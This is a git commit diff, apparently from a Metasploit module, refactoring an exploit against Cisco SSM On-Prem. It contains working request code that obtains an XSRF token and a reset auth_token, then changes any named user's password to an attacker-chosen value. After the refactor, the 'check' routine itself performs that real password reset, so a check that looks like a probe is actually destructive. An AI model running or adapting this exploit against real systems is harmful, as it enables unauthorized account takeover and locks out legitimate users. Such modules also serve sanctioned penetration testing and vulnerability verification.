Refactoring

h4x-x0r · h4x-x0r · commit 322188a112c8 · 2024-09-23T13:29:46.000+01:00
Refactored code to remove duplicate requests
diff --git a/modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb b/modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb
@@ -40,8 +40,8 @@ def initialize(info = {})
     ])
   end
 
-  def check
-    # 1) Request oauth_adfs to obtain XSRF-TOKEN and _lic_engine_session
+  # 1) Request oauth_adfs to obtain XSRF-TOKEN and _lic_engine_session
+  def xsrf_token_value
     res = send_request_cgi(
       'method' => 'GET',
       'keep_cookies' => true,
@@ -59,8 +59,11 @@ def check
 
     decoded_xsrf_token = decode_url(xsrf_token_value)
     print_good("Retrieved XSRF Token: #{decoded_xsrf_token}")
+    decoded_xsrf_token
+  end
 
-    # 2) Request generate_code to retrieve auth_token
+  # 2) Request generate_code to retrieve auth_token
+  def auth_token(decoded_xsrf_token)
     payload = {
       uid: datastore['USER']
     }.to_json
@@ -86,8 +89,11 @@ def check
     end
 
     auth_token = json['auth_token']
+    auth_token
+  end
 
-    # 3) Request reset_password to change the password of the specified user
+  # 3) Request reset_password to change the password of the specified user
+  def reset_password(decoded_xsrf_token, auth_token)
     payload = {
       uid: datastore['USER'],
       auth_token: auth_token,
@@ -110,9 +116,22 @@ def check
     fail_with(Failure::UnexpectedReply, 'Password reset attempt failed') unless res&.code == 200
 
     json = res.get_json_document
-    if json.key?('error')
+    json
+  end
+
+  def check
+    @xsrf_token_value = xsrf_token_value
+    return Exploit::CheckCode::Unknown('Unable to determine the version (xsrf_token_value missing).') unless @xsrf_token_value
+
+    @auth_token = auth_token(@xsrf_token_value)
+    return Exploit::CheckCode::Unknown('Unable to determine the version (auth_token missing).') unless @auth_token
+
+    @reset_password = reset_password(@xsrf_token_value, @auth_token)
+    return Exploit::CheckCode::Unknown('Unable to determine the version (reset_password failed).') unless @reset_password
+
+    if @reset_password.key?('error')
       return Exploit::CheckCode::Safe
-    elsif json.key?('status')
+    elsif @reset_password.key?('status')
       return Exploit::CheckCode::Appears
     end
 
@@ -126,79 +145,9 @@ def decode_url(encoded_string)
   end
 
   def run
-    # 1) Request oauth_adfs to obtain XSRF-TOKEN and _lic_engine_session
-    res = send_request_cgi(
-      'method' => 'GET',
-      'keep_cookies' => true,
-      'uri' => normalize_uri(target_uri.path, 'backend/settings/oauth_adfs'),
-      'vars_get' => {
-        'hostname' => Rex::Text.rand_text_alpha(6..10)
-      }
-    )
-
-    fail_with(Failure::UnexpectedReply, 'Failed to get a 200 response from the server.') unless res&.code == 200
-    print_good('Server reachable.')
-
-    # Extract XSRF-TOKEN value
-    xsrf_token_value = res.get_cookies.scan(/XSRF-TOKEN=([^;]*)/).flatten[0]
-    fail_with(Failure::UnexpectedReply, 'XSRF Token not found') unless xsrf_token_value
-
-    decoded_xsrf_token = decode_url(xsrf_token_value)
-    print_good("Retrieved XSRF Token: #{decoded_xsrf_token}")
-
-    # 2) Request generate_code to retrieve auth_token
-    payload = {
-      uid: datastore['USER']
-    }.to_json
-
-    res = send_request_cgi({
-      'method' => 'POST',
-      'ctype' => 'application/json',
-      'keep_cookies' => true,
-      'headers' => {
-        'X-Xsrf-Token' => decoded_xsrf_token
-      },
-      'uri' => normalize_uri(target_uri.path, 'backend/reset_password/generate_code'),
-      'data' => payload
-    })
-
-    fail_with(Failure::UnexpectedReply, 'Request /backend/reset_password/generate_code to retrieve auth_token did not return a 200 response') unless res&.code == 200
-
-    json = res.get_json_document
-    if json.key?('error_message')
-      fail_with(Failure::UnexpectedReply, json['error_message'])
-    elsif json.key?('auth_token')
-      print_good('Retrieved auth_token: ' + json['auth_token'])
-    end
-
-    auth_token = json['auth_token']
-
-    # 3) Request reset_password to change the password of the specified user
-    payload = {
-      uid: datastore['USER'],
-      auth_token: auth_token,
-      password: datastore['NEW_PASSWORD'],
-      password_confirmation: datastore['NEW_PASSWORD'],
-      common_name: ''
-    }.to_json
-
-    res = send_request_cgi({
-      'method' => 'POST',
-      'ctype' => 'application/json',
-      'keep_cookies' => true,
-      'headers' => {
-        'X-Xsrf-Token' => decoded_xsrf_token
-      },
-      'uri' => normalize_uri(target_uri.path, 'backend/reset_password'),
-      'data' => payload
-    })
-
-    fail_with(Failure::UnexpectedReply, 'Password reset attempt failed') unless res&.code == 200
-
-    json = res.get_json_document
-    if json.key?('error_message')
-      fail_with(Failure::UnexpectedReply, json['error_message'])
-    end
+    @xsrf_token_value ||= xsrf_token_value
+    @auth_token ||= auth_token(@xsrf_token_value)
+    @reset_password ||= reset_password(@xsrf_token_value, @auth_token)
 
     # 4) Confirm that we can authenticate with the new password
     payload = {
@@ -211,7 +160,7 @@ def run
       'ctype' => 'application/json',
       'keep_cookies' => true,
       'headers' => {
-        'X-Xsrf-Token' => decoded_xsrf_token,
+        'X-Xsrf-Token' => @xsrf_token_value,
         'Accept' => 'application/json'
       },
       'uri' => normalize_uri(target_uri.path, 'backend/auth/identity/callback'),
